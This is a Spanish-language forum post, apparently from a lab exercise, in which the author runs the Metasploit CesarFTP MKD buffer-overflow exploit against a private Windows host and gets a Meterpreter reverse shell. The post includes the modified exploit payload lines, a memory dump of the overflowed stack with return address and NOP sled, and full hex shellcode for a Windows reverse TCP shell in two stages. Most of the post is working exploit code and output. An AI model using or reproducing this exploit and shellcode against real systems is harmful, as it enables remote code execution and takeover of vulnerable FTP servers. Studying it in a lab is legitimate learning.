Te cuento lo que acabo de investigar...
como no hay manera de hacer funcionar el script, he modificado un poco el modulo ruby de metasploit, cambiado los siguientes valores
root@bt:~/Desktop/cesar# msfcli exploit/windows/ftp/cesarftp_mkd RHOST=192.168.11.15 FTPPASS=ftp FTPUSER=ftp E
[*] Please wait while we load the module tree...
RHOST => 192.168.11.15
FTPPASS => ftp
FTPUSER => ftp
[*] Started reverse handler on 192.168.10.195:4444
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 192.168.11.15
[*] Meterpreter session 1 opened (192.168.10.195:4444 -> 192.168.11.15:1115) at 2012-03-02 23:48:17 +0100
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exit
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded + "\r\n"
por esto otro.
sploit = "\n" * 671 + "AAA"
sploit << [target.ret].pack('V') + "\x90" * 40 + "\xcc\xcc\xcc\xcc" + payload.encoded + "\xcc\xcc\xcc\xcc" + "\r\n"
y he obtenido el siguiente resultado.
00B0EE40 350A0D2D -..5 #buffer "\n" * 671
00B0EE44 0D2D3035 50-. #buffer "\n" * 671
00B0EE48 3035350A .550 #buffer "\n" * 671
00B0EE4C 41414120 AAA # "AAA"
00B0EE50 77D5AA01 ªÕw USER32.77D5AA01 # SALTO A JMP ESP
00B0EE54 90909090 # Nops
00B0EE58 90909090 # Nops
00B0EE5C 90909090 # Nops
00B0EE60 90909090 # Nops
00B0EE64 90909090 # Nops
00B0EE68 90909090 # Nops
00B0EE6C 90909090 # Nops
00B0EE70 90909090 # Nops
00B0EE74 90909090 # Nops
00B0EE78 90909090 # Nops
00B0EE7C D42AFD03 ý*Ô # Shellcode
00B0EE80 E011737F sà # Shellcode
00B0EE84 7F4B782F /xK # Shellcode
00B0EE88 D50B7A14 zÕ # Shellcode
00B0EE8C 7D157BB7 ·{} SHELL32.7D157BB7 # Shellcode #Esto no estara llamando a algun lado?
00B0EE90 72B4B043 C°´r # Shellcode
00B0EE94 7C679246 F’g| # Shellcode
00B0EE98 4E76F510 õvN # Shellcode
00B0EE9C 32751D77 wu2 # Shellcode
00B0EEA0 9F4FEBF7 ÷ëOŸ # Shellcode
00B0EEA4 7443E3B4 ´ãCt # Shellcode
00B0EEA8 C0A92C2F /,©À # Shellcode
00B0EEAC E13070F8 øp0á # Shellcode
..... etc
Luego por interpretacion propia pienso que:
[*] Started reverse handler on 192.168.10.195:4444 # Monta el listening en el 4444 local
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes) # manda la shellcode
[*] Sending stage (752128 bytes) to 192.168.11.15 # Manda el payload meterpreter pero ya habiendo conectado con el handler
Que no entiendo... pues basicamente, si yo en BT ejecuto el siguiente comando:
root@bt:~/Desktop/cesar# msfpayload windows/shell/reverse_ord_tcp LHOST="192.168.10.195" EXITFUNC=process P
Me devuelve dos codigos.
# windows/shell/reverse_ord_tcp - 93 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.10.195, LPORT=4444,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b" .
"\x12\x8b\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32" .
"\x75\xef\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c" .
"\x0d\x1c\x01\xe9\x8b\x41\x58\x01\xe8\x8b\x71\x3c\x01\xee" .
"\x03\x69\x0c\x53\x6a\x01\x6a\x02\xff\xd0\x97\x68\xc0\xa8" .
"\x0a\xc3\x68\x02\x00\x11\x5c\x89\xe1\x53\xb7\x0c\x53\x51" .
"\x57\x51\x6a\x10\x51\x57\x56\xff\xe5"
# windows/shell/reverse_ord_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
my $buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" .
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" .
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" .
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" .
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" .
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" .
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" .
"\xff\xd5"
Ya mas no alcanzo... si quieres que haga algo lo hago encantado Ivanchuk.
Un saludo.